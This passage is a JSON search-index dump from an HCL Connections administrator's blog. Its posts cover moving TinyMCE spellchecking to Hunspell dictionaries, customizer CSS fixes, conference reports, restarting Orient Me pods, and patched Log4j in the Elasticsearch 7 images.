it looked like the issue was really resolved. Sadly, after about a week, the first application server started to use 800% CPU just for the server hosting the spelling service.\nIn the application server logs, we found messages like:\nSystemOut.log of the application server running spellchecking service So first, we see debug messages without enabling a trace, and on the top of the image, we see that a request ran over 1000 ms.\nSupport sent me the steps to disable the debug messages:\nCreate a file called /opt/ephox/logback.xml 1 2 3 4 5 6 7 8 9 10 11 12 13 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34;?\u0026gt; \u0026lt;configuration\u0026gt; \u0026lt;appender name=\u0026#34;CONSOLE\u0026#34; class=\u0026#34;ch.qos.logback.core.ConsoleAppender\u0026#34;\u0026gt; \u0026lt;target\u0026gt;System.out\u0026lt;/target\u0026gt; \u0026lt;encoder\u0026gt; \u0026lt;pattern\u0026gt;%date{yyyy-MM-dd HH:mm:ss.SSSX} [%thread] %-5level %logger{36} - %msg%n\u0026lt;/pattern\u0026gt; \u0026lt;/encoder\u0026gt; \u0026lt;/appender\u0026gt; \u0026lt;logger name=\u0026#34;ironbark\u0026#34; level=\u0026#34;WARN\u0026#34;/\u0026gt; \u0026lt;root level=\u0026#34;INFO\u0026#34;\u0026gt; \u0026lt;appender-ref ref=\u0026#34;CONSOLE\u0026#34;/\u0026gt; \u0026lt;/root\u0026gt; \u0026lt;/configuration\u0026gt; Important is line 9, which is set to DEBUG for TinyMCE 5.10.2, but WARN or ERROR will prevent these log messages.\nAdd a custom JVM property (Server \u0026gt; Server Types \u0026gt; WebSphere Application Servers → server name \u0026gt; Process Definition \u0026gt; Java Virtual Machine \u0026gt; Custom Properties) to the application server where you installed the spellchecker. logback.configurationFile: /opt/ephox/logback.xml After this, the performance was slightly better, but still not good.\nToday, I got the following update from Tiny:\nBroadly, we believe that WinterTree spelling library is having problems with long words with possible hyphens, especially in German. In this case, we recommending trying the Hunspell library instead.\nWe can see that the problem language is always German, and the number of characters is higher than 20. Due to implementation aspects with how WinterTree\u0026rsquo;s spelling engine works, these cases can be particularly problematic.\nThe most egregious offender is:\nTook 25270 milliseconds.\nWhich meant that it took over 25 seconds to generate suggestions for 1 word in a document. As you can imagine, when this starts happening, sending lots of words becomes a problem. However, there aren\u0026rsquo;t many words that take more than 1 second to generate, because this is the entire list in the logs sent to us.\nIn general, you could likely avoid this behavior by using Hunspell libraries, particularly for German. Here is our documentation about adding Hunspell dictionaries to Spellchecker Pro. You likely have specific separate instructions for setting up Hunspell, but it will be effectively the same under the hood, as it\u0026rsquo;s a server-only setting.\nhttps://www.tiny.cloud/docs/tinymce/6/self-hosting-hunspell/ Tiny/HCL Support So here I could stop and point you to support, but I have had some issues during the activation of Hunspell so far.\nFirst, the webpage says, “Tiny provides two downloadable bundles of Hunspell dictionaries,” which I couldn’t find. So I searched for other download options. The best match were the dictionaries included with LibreOffice : https://github.com/libreoffice/dictionaries , but the folder structure and naming do not match the one requested by Tiny.\n#!/usr/bin/env bash git clone https://github.com/LibreOffice/dictionaries.git /tmp/dictionaries for i in af_ZA da de_DE en_AU en_CA en_GB en_US es fr hu it_IT nb_NO nl_NL nn pl pt_BR pt_PT sv_FI sv_SE ; do mkdir -p /opt/ephox/hunspell-dictionaries/$i find /tmp/dictionaries -iname $i*.aff -exec cp {} /opt/ephox/hunspell-dictionaries/$i/$i.aff \\; find /tmp/dictionaries -iname $i*.dic -exec cp {} /opt/ephox/hunspell-dictionaries/$i/$i.dic \\; done This script creates the expected folder structure and copies the dictionaries to the right place.\ntree /opt/ephox/hunspell-dictionaries/ /opt/ephox/hunspell-dictionaries/ ├── af_ZA │ ├── af_ZA.aff │ └── af_ZA.dic ├── da │ ├── da.aff │ └── da.dic ├── de_DE │ ├── de_DE.aff │ └── de_DE.dic ├── en_AU │ ├── en_AU.aff │ └── en_AU.dic ├── en_CA │ ├── en_CA.aff │ └── en_CA.dic ├── en_GB │ ├── en_GB.aff │ └── en_GB.dic ├── en_US │ ├── en_US.aff │ └── en_US.dic ├── es │ ├── es.aff │ └── es.dic ├── fr │ ├── fr.aff │ └── fr.dic ├── hu │ ├── hu.aff │ └── hu.dic ├── it_IT │ ├── it_IT.aff │ └── it_IT.dic ├── nb_NO │ ├── nb_NO.aff │ └── nb_NO.dic ├── nl_NL │ ├── nl_NL.aff │ └── nl_NL.dic ├── nn │ ├── nn.aff │ └── nn.dic ├── pl │ ├── pl.aff │ └── pl.dic ├── pt_BR │ ├── pt_BR.aff │ └── pt_BR.dic ├── pt_PT │ ├── pt_PT.aff │ └── pt_PT.dic ├── sv_FI │ ├── sv_FI.aff │ └── sv_FI.dic └── sv_SE ├── sv_SE.aff └── sv_SE.dic 19 directories, 38 files Now we have to enable the Hunspell-dictionaries in /opt/ephox/application.conf and restart the spellchecking service.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 cat /opt/ephox/application.conf ephox { allowed-origins { origins = [ \u0026#34;http://cnx7-rh8-was.stoeps.home\u0026#34;, \u0026#34;https://cnx7-rh8-was.stoeps.home\u0026#34;, \u0026#34;https://cnx7-rh8.stoeps.home\u0026#34;, \u0026#34;http://cnx7-rh8-was.stoeps.home:9081\u0026#34;, \u0026#34;https://cnx7-rh8-was.stoeps.home:9444\u0026#34; ] } spelling { hunspell-dictionaries-path = \u0026#34;/opt/ephox/hunspell-dictionaries\u0026#34; } } Don\u0026rsquo;t forget to enable spell checking in SharedDirectory/customization/javascript/tiny/editors/connections/config.js\n... // Set to false to disable Tiny\u0026#39;s spell checking service in TinyMCE and Textbox.io. spellingServiceEnabled: true, ... Results I tested with WinterTree (default) and Hunspell.\nTesting some long words with WinterTree Here we see the first long word underlined red, this generated the log message that the request needed longer than 1000ms [7/12/22 17:35:35:152 UTC] 00000132 SystemOut O 2022-07-12 17:35:35.152Z [ioapp-compute-1] INFO ironbark - request [ uuid-47ac0625-f6dc-4876-8127-59b50595cd0f ] Response =\u0026gt; Status: 200 OK (12 ms) [7/12/22 17:35:35:212 UTC] 00000139 SystemOut O 2022-07-12 17:35:35.212Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (100.0 % - 1 / 1 incorrect) [7/12/22 17:35:35:212 UTC] 00000139 SystemOut O 2022-07-12 17:35:35.212Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (1 words) (BEGIN) [7/12/22 17:35:38:865 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.865Z [ioapp-compute-4] WARN ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] PERFORMANCE_ALERT: word took longer than 1000 milliseconds. Took 3652 milliseconds. * Language: de * Number of characters: 48 * Number of hyphens: 0 * Number of apostrophes: 0 * Number of suggestions generated: 16 [7/12/22 17:35:38:865 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.865Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-ac3ac5bf-eb12-4e72-a98b-a9c93f288093 ] Spellall (1 words) (END) [7/12/22 17:35:38:866 UTC] 00000139 SystemOut O 2022-07-12 17:35:38.866Z [ioapp-compute-4] INFO ironbark - request [ uuid-9347efc7-7705-4bcb-911c-1506d1d3b90a ] Response =\u0026gt; Status: 200 OK (3726 ms) We see the request needs 3.6 seconds and the word was 48 characters long.\nTesting the same with Hunspell enabled Here the result appeared faster and no warning message is logged. [7/12/22 20:10:12:798 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.798Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-0958072a-bf4c-4cb6-8acd-e2e7e8fb2870 ] Spellall (7 words) (BEGIN) [7/12/22 20:10:12:798 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.798Z [ioapp-compute-4] DEBUG ironbark - request [ uuid-0958072a-bf4c-4cb6-8acd-e2e7e8fb2870 ] Spellall (7 words) (END) [7/12/22 20:10:12:800 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.800Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:801 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.800Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:801 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-199c0261-36e8-4173-807a-13a4a8ebce6b ] Spellall (1 words) (END) [7/12/22 20:10:12:801 UTC] 00000134 SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-4] INFO ironbark - request [ uuid-4655f8a9-a466-4ad4-8874-d91f5fc8fc9b ] Response =\u0026gt; Status: 200 OK (18 ms) [7/12/22 20:10:12:801 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.801Z [ioapp-compute-1] INFO ironbark - request [ uuid-9117e582-90f5-4246-bd17-56d00c12b975 ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:803 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.803Z [ioapp-compute-2] INFO ironbark - request [ uuid-938f2c71-701b-4312-9183-426b81829297 ] Response =\u0026gt; Status: 200 OK (16 ms) [7/12/22 20:10:12:803 UTC] 00000133 SystemOut O 2022-07-12 20:10:12.803Z [ioapp-compute-3] INFO ironbark - request [ uuid-67b5ef69-2079-43eb-908f-bd0017f715e2 ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:808 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.808Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:811 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:811 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:812 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.811Z [ioapp-compute-1] DEBUG ironbark - request [ uuid-202c5596-0fae-4cc4-8793-7feb458b3b0c ] Spellall (1 words) (END) [7/12/22 20:10:12:814 UTC] 0000012f SystemOut O 2022-07-12 20:10:12.814Z [ioapp-compute-1] INFO ironbark - request [ uuid-9117e582-90f5-4246-bd17-56d00c12b975 ] Response =\u0026gt; Status: 200 OK (13 ms) [7/12/22 20:10:12:817 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.817Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:819 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.819Z [ioapp-compute-2] DEBUG ironbark - request [ uuid-8f7cc6c4-60f7-4535-ad4a-04a49aa4b389 ] Spellall (1 words) (END) [7/12/22 20:10:12:822 UTC] 00000132 SystemOut O 2022-07-12 20:10:12.821Z [ioapp-compute-2] INFO ironbark - request [ uuid-67b5ef69-2079-43eb-908f-bd0017f715e2 ] Response =\u0026gt; Status: 200 OK (18 ms) [7/12/22 20:10:12:854 UTC] 00000133 SystemOut O 2022-07-12 20:10:12.854Z [ioapp-compute-3] INFO ironbark - request [ uuid-0b4d740e-a06b-4a1a-a75e-e6a680a2d41d ] Request =\u0026gt; POST /tiny-spelling/2/suggestions [7/12/22 20:10:12:860 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.860Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Incoming suggestions-V2 request for: 1 word(s) in language: de from API Key: none [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (0.0 % - 0 / 1 incorrect) [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (1 words) (BEGIN) [7/12/22 20:10:12:862 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.862Z [ioapp-compute-5] DEBUG ironbark - request [ uuid-15c6b13d-a3f7-4fbb-8b43-6bf6a6074b26 ] Spellall (1 words) (END) [7/12/22 20:10:12:864 UTC] 00000135 SystemOut O 2022-07-12 20:10:12.864Z [ioapp-compute-5] INFO ironbark - request [ uuid-0b4d740e-a06b-4a1a-a75e-e6a680a2d41d ] Response =\u0026gt; Status: 200 OK (10 ms) So for German spellchecking, it appears that Hunspell is working faster and giving suggestions even for long words. No, high CPU or waiting message has appeared so far. I never thought about these long German words until I read the answer from Tiny Support. When your users write documents in Connections in German, I would suggest you change the spellchecker too.\n","excerpt":"\u003cp\u003eIn the last few years, I have had issues with application servers using a large amount of CPU and even hanging application servers running the Tiny Spellchecking service. It ended with disabled spellchecking in the Tiny Editors\u0026rsquo; \u003ccode\u003econfig.js\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/change-spellchecking-to-hunspell-in-tinymce/","title":"Change spellchecking to hunspell in TinyMCE"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/dictionary/","title":"Dictionary"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hunspell/","title":"Hunspell"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/spellchecking/","title":"Spellchecking"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/spellchecking/","title":"Spellchecking"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tinymce/","title":"TinyMCE"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/connections/","title":"Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/customizer/","title":"Customizer"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/customizer/","title":"Customizer"},{"body":"I created a git repository with some smaller CSS files to fix some annoyances within HCL Connections.\nI started with this to prevent Orient Me to load fonts from external URLs or Elasticsearch Metrics to break the UI on larger screens. These issues are solved after the last updates I got from support, but Blogs and Tailored Experience Wizard can be improved with some simple rules.\nActivate the CSS injection with Customizer The following steps enable the changes.\nRoute /te-creation-wizard through customizer Add the URL to NGINX configuration:\nlocation ~ ^/(files/customizer|files/app|communities/service/html|forums/html|search/web|homepage/web|social/home|mycontacts|wikis/home|blogs|news|activities/service/html|profiles/html|viewer|te-creation-wizard) { proxy_pass http://cnx7-rh8.stoeps.home:30301; } Add |te-creation-wizard to the rule which forwards to port 30301. Or find the line which starts with location ~ ^/(files/customizer|... and add it within the parenthesis.\nSo now the URL for Tailored Experience Wizards are routed through customizer.\nClone repository to customizer NFS share cd /pv-connections/customizer git clone https://github.com/stoeps13/stoeps-customizer-css.git Import app to customizer Import the file stoeps-customizer-css.json to the App Registry (URL: https://your-connections-url/appreg \u0026ndash; you need the admin role in Common App to access it!).\nOr use this snippet:\n{ \u0026#34;name\u0026#34;: \u0026#34;CSS Customizations\u0026#34;, \u0026#34;title\u0026#34;: \u0026#34;Fixing tiny annoying things\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Adding some css to fix the most annoying things..\u0026#34;, \u0026#34;services\u0026#34;: [ \u0026#34;Customizer\u0026#34; ], \u0026#34;extensions\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;Blogs\u0026#34;, \u0026#34;type\u0026#34;: \u0026#34;com.ibm.customizer.ui\u0026#34;, \u0026#34;payload\u0026#34;: { \u0026#34;include-files\u0026#34;: [ \u0026#34;stoeps-customizer-css/blogs.css\u0026#34; ], \u0026#34;cache-headers\u0026#34;: { \u0026#34;cache-control\u0026#34;: \u0026#34;max-age=0\u0026#34; } }, \u0026#34;path\u0026#34;: \u0026#34;blogs\u0026#34;, \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34; }, { \u0026#34;name\u0026#34;: \u0026#34;TE Wizard\u0026#34;, \u0026#34;type\u0026#34;: \u0026#34;com.ibm.customizer.ui\u0026#34;, \u0026#34;payload\u0026#34;: { \u0026#34;include-files\u0026#34;: [ \u0026#34;stoeps-customizer-css/te-wizard.css\u0026#34; ], \u0026#34;cache-headers\u0026#34;: { \u0026#34;cache-control\u0026#34;: \u0026#34;max-age=0\u0026#34; } }, \u0026#34;path\u0026#34;: \u0026#34;te-creation-wizard\u0026#34;, \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34; } ] } Use New App \u0026gt; Code Editor \u0026gt; Import and save the changes to do this.\nWhich changes are active Blogs Without the customization, it is hard to see where a post starts or ends in the overview. With the customization Tailored Experience Wizard I started this, because the Tailored Experience Wizard does not recognize changes in the communities-policy.xml. So if you have changed the available Community Types, like described in Preventing members from creating specific community types , all Community Types are still visible and in case of Restricted Communities, the creation fails for Communities created from a template, even for public or moderated Communities.\nI have a case open with HCL on this, but until now there is no fix available.\nWithout the customization, all Community Types are allowed, there are two useless options on the left column. With the customization This will only hide the option, but when anybody changes the CSS in browser developer tools, or just use the API to create a community, this will be successful. The better option is to disable in the communities-policy.xml and wait for a fix until you enable the TE Wizard.\n","excerpt":"\u003cp\u003eI created a \u003ca href=\"https://github.com/stoeps13/stoeps-customizer-css\" target=\"_blank\"\u003egit repository \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nwith some smaller CSS files to fix some annoyances within HCL Connections.\u003c/p\u003e\n\u003cp\u003eI started with this to prevent Orient Me to load fonts from external URLs or\nElasticsearch Metrics to break the UI on larger screens.\nThese issues are solved after the last updates I got from support, but Blogs\nand Tailored Experience Wizard can be improved with some simple rules.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/fix-some-annoyances-with-customizer/","title":"Fix some annoyances with Customizer"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclcnx/","title":"Hclcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/conference/","title":"Conference"},{"body":"The annual conference of DNUG took place in Constance from 22nd to 23rd of June 2022.\nI attended the HCL Connections Roadmap session given by Rene Schimmer and David Strachan. They showed the updates for version 8 and beyond.\nTalking about version 8. HCL Connections will get named after evergreen trees from version 8. New naming scheme for Connections - ©HCL Software So next HCL Connections release is Cedar. For this version a public preview is available, when you are not already registered, have a look at following urls.\nAccess Preview 8 - https://hclsw.co/c8community Register for Preview 8 - https://hclsw.co/c8pre Connections 8 Preview - ©HCL Software There were several sessions on HCL Connections, but one I will long remember:\nEinmal in “schön” bitte: Wie wir die KOSMOS beim Umbau der HCL Connections Communities unterstützt haben Sandra Buehler and Olaf Braun did a very entertaining session and talked about their project to bring Connections within KOSMOS to a new level. The project should ensure that a selected number of communities meet current user requirements, both in terms of content and layout.\nI did a session on open-source tools I use on a regular basis. They can help to administrate, document or troubleshoot a Connections environment, but can also be used for most web applications.\nSession slides HCL Connections Admin Toolbox and as a list , if you only want to see the tools.\nYour browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html) ","excerpt":"\u003cp\u003eThe annual conference of \u003ca href=\"https://dnug.de\" target=\"_blank\"\u003eDNUG \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n took place in Constance from\n22nd to 23rd of June 2022.\u003c/p\u003e\n\u003cp\u003eI attended the HCL Connections Roadmap session given by Rene Schimmer and David Strachan.\nThey showed the updates for version 8 and beyond.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/dachnug49/","title":"Dachnug49 in Constance"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/componentpack/","title":"Componentpack"},{"body":"After rebooting the Kubernetes server for HCL Connections Componentpack, I sometimes see that Orient Me is not working and just shows:\n{\u0026#34;error\u0026#34;:{\u0026#34;statusCode\u0026#34;:500,\u0026#34;message\u0026#34;:\u0026#34;Internal Server Error\u0026#34;}} I think one of the liveness checks could be improved, but for now the following commands restart just the necessary amount of pods to get Orient Me back running.\nkubectl rollout restart statefulset redis-server sleep 45 kubectl rollout restart deployment redis-sentinel sleep 90 kubectl rollout restart deployment orient-web-client ","excerpt":"\u003cp\u003eAfter rebooting the Kubernetes server for HCL Connections Componentpack,\nI sometimes see that Orient Me is not working and just shows:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-json\" data-lang=\"json\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e{\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;error\u0026#34;\u003c/span\u003e:{\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;statusCode\u0026#34;\u003c/span\u003e:\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e500\u003c/span\u003e,\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;message\u0026#34;\u003c/span\u003e:\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;Internal Server Error\u0026#34;\u003c/span\u003e}}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2022/restart-orientwebclient/","title":"Restart Orient Me pods after Internal Server Error"},{"body":"CVE-2021-44228 was a very serious problem end of 2021, and we are still finding new occurrences, or security teams scan servers and find vulnerable log4j files. Don\u0026rsquo;t get me wrong most of these occurrences are not vulnerable any more, because the JVM is hardened like in the Elasticsearch 7 containers, or they use of the JVM parameter -Dlog4j2.formatMsgNoLookups=true.\nA good summary and explanation can be found in Mitigate Log4j / Log4Shell in Elasticsearch (CVE-2021-44228) and Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 . So some versions of Elasticsearch 7 are using the vulnerable library, but are not vulnerable and provide the RCE, because the official Elasticsearch images are using the Java Security Manager and the images from HCL are on Java 11 which is not vulnerable for RCE and information leakage with Log4Shell.\nbash-5.0# java -version openjdk version \u0026#34;11.0.9\u0026#34; 2020-10-20 OpenJDK Runtime Environment (build 11.0.9+11-alpine-r0) OpenJDK 64-Bit Server VM (build 11.0.9+11-alpine-r0, mixed mode) Elasticsearch mitigation summary matrix So the Security Bulletin: Apache Log4j 2 Vulnerability in Elasticsearch distributed in HCL Connections Component Pack(CVE-2021-44228) is not wrong when it tells us, that Connections 7 is not vulnerable for the log4shell CVE, but Componentpack 7.0.0.2 is using Elasticsearch 7.10.1 and this is distributed with log4j \u0026lt; 2.17.0.\nI tried to find an update in the knowledge base, but couldn\u0026rsquo;t find more as the mentioned security bulletin. So I opened a case and first I got told that the image is not vulnerable, and no updates are available, but I asked for updated images because the security team at my customer does not accept this.\nYesterday I got the following answer:\nES7 was not affected, however, out of an abundance of caution they did merge log4j 2.17.0 into their ES7 image so we have done the same. The existing log4j on our ES7 docker image has been deleted and replaced with 2.17.0.\nThe latest ES7 image which includes the updated log4j 2.17.0 is available on Flexnet. Below is the link to Connections 7 downloads: https://hclsoftware.flexnetoperations.com/flexnet/operationsportal/entitledDownloadFile.action?downloadPkgId=HCL_Connections_7.0\u0026orgId=HCL The customer should download the following:\nReadMe which includes instructions to load and register the new ES7 docker image along w/ the image and helm chart: ReadMe for the Elastic Search 7 update for HCL Connection Component Pack 3.28KB May 20, 2022 elasticsearch720220310-143242-ReadMe.txt\nThis package contains an update for Elastic Search 7 for HCL Connections Component Pack v7.0.0.x and v7.0.0.2 560.03MB May 02, 2022 elasticsearch720220310-143242.tgz\nThis package contains an updated helm chart for Elastic Search 7 for HCL Connections Component Pack v7.0.0.x and v7.0.0.2 38.6KB May 02, 2022 elasticsearch7-0.1.0-20220310-143242.tgz\nHCL Support The images to update Elasticsearch 7 are availble since May on Flexnet!\nAs this is nowhere documented, I asked for an updated knowledge base article and post it here, so you can update your environment too. Main advantage of the image update: no more questions why your software is staying with old and vulnerable libraries.\n","excerpt":"\u003cp\u003eCVE-2021-44228 was a very serious problem end of 2021, and we are still finding new occurrences, or security teams scan servers and find vulnerable log4j files. Don\u0026rsquo;t get me wrong most of these occurrences are not vulnerable any more, because the JVM is hardened like in the Elasticsearch 7 containers, or they use of the JVM parameter \u003ccode\u003e-Dlog4j2.formatMsgNoLookups=true\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/elasticsearch7-update/","title":"Elasticsearch7 Update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/update/","title":"Update"},{"body":"The last days I attended Engage 2022 in the Bruges Meeting \u0026amp; Convention Centre (BMCC) . The first in person event for HCL Software for two years. Engage 2020 was the last event before the big lockdowns. Meeting so many friends again after so long time felt really awesome, and I enjoyed these days very much. We had good conversations and some Belgium beer to celebrate the reunion.\nThis was my 6th or 7th Engage and as always the organizers around Theo and his wife Hilde did a great job, arriving at the venue felt like coming home.\nDuring the keynote with Richard Jefts and Jason Gary we got the new naming conventions for new releases, so Domino will get river names (next version Danube) and Connections will get named after trees (Cedar).\nHCL Connections roadmap session with Adam Gartenberg and Rene Schimmer showed the updates for version 8 and \u0026lsquo;Connections v8 Live Demo: Collaboration just got easier!\u0026rsquo; with Stefan Hessler and David Bell gave insights to the new customizations in Connections 8 . Like changing the top and side navigation or add a banner notification. The preview of Connections 8 was updated to the next iteration last week, if you are not already registered, here is the link to get an invitation .\nThe following images are copied from the original slide deck, authors: Stefan Hessler, David Bell! The complete slide deck is available here .\nConnections 8 GUI - © HCL Software One of the new features in Connections 8 is a banner to inform users directly. The message will be displayed on top of the page.\nNew banner function in Connections 8 - © HCL Software So you can enable the banner with some API calls, so you can integrate into your CI/CD pipeline or tool chain.\nNew banner in Connections 8 - © HCL Software I have not made photos from these slides, they will be available the next days on the Engage homepage and I will update the posts with some matching slides. There were a lot of important HCLers available during the event, product management, developers and architects were open and answered questions or discussed features of Connections 8.\nIf you missed Engage, then have a look at DACHNUG , which takes place from 20th to 22nd June 2022 in Konstanz .\nI did the session named \u0026lsquo;HCL Connections Admin Toolbox\u0026rsquo; and showed a collection of tools I use for my daily work.\nHCL Connections Admin Toolbox Best viewed in fullscreen (use F11 in any browser) I created a new page with all links to tools I use , so when you search the download links mentioned in the slide deck, then you can use this overview. Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html) ","excerpt":"\u003cp\u003eThe last days I attended \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003eEngage 2022 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the \u003ca href=\"https://www.visitbrugesconventionbureau.be\" target=\"_blank\"\u003e\nBruges Meeting \u0026amp; Convention Centre (BMCC) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. The first in person event for HCL Software for two years. Engage 2020 was the last event before the big lockdowns. Meeting so many friends again after so long time felt really awesome, and I enjoyed these days very much. We had good conversations and some Belgium beer to celebrate the reunion.\u003c/p\u003e\n\u003cp\u003eThis was my 6th or 7th Engage and as always the \u003ca href=\"https://engage.ug/Engage2.nsf/Pages/about\" target=\"_blank\"\u003eorganizers \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n around \u003ca href=\"https://twitter.com/theoheselmans\" target=\"_blank\"\u003eTheo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and his wife Hilde did a great job, arriving at the venue felt like coming home.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/engage2022/","title":"Engage 2022"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/communities/","title":"Communities"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/component-pack/","title":"Component Pack"},{"body":"Today I got the question of how to disable the highlights app in Connections 7. When you follow the documentation for Connections 6.0CR6 you get an error message (and the document is not available in Connections 7).\nI commented out the widget definition in widgets-config.xml like described in the documentation for the former release.\n\u0026lt;!-- IBM CONNECTIONS ENGAGEMENT CENTRE - ICEC4Communities --\u0026gt; \u0026lt;!-- \u0026lt;widgetDef bundleRefId=\u0026#34;highlights\u0026#34; defId=\u0026#34;Highlights\u0026#34; description=\u0026#34;Highlights.description\u0026#34; modes=\u0026#34;view fullpage\u0026#34; showInPalette=\u0026#34;true\u0026#34; themes=\u0026#34;wpthemeNarrow wpthemeWide wpthemeBanner\u0026#34; uniqueInstance=\u0026#34;true\u0026#34; url=\u0026#34;{webresourcesSvcRef}/../../xcc/templates/iWidgetXCCCommunityDefinition.xml\u0026#34;\u0026gt; \u0026lt;itemSet\u0026gt; \u0026lt;item name=\u0026#34;lang\u0026#34; 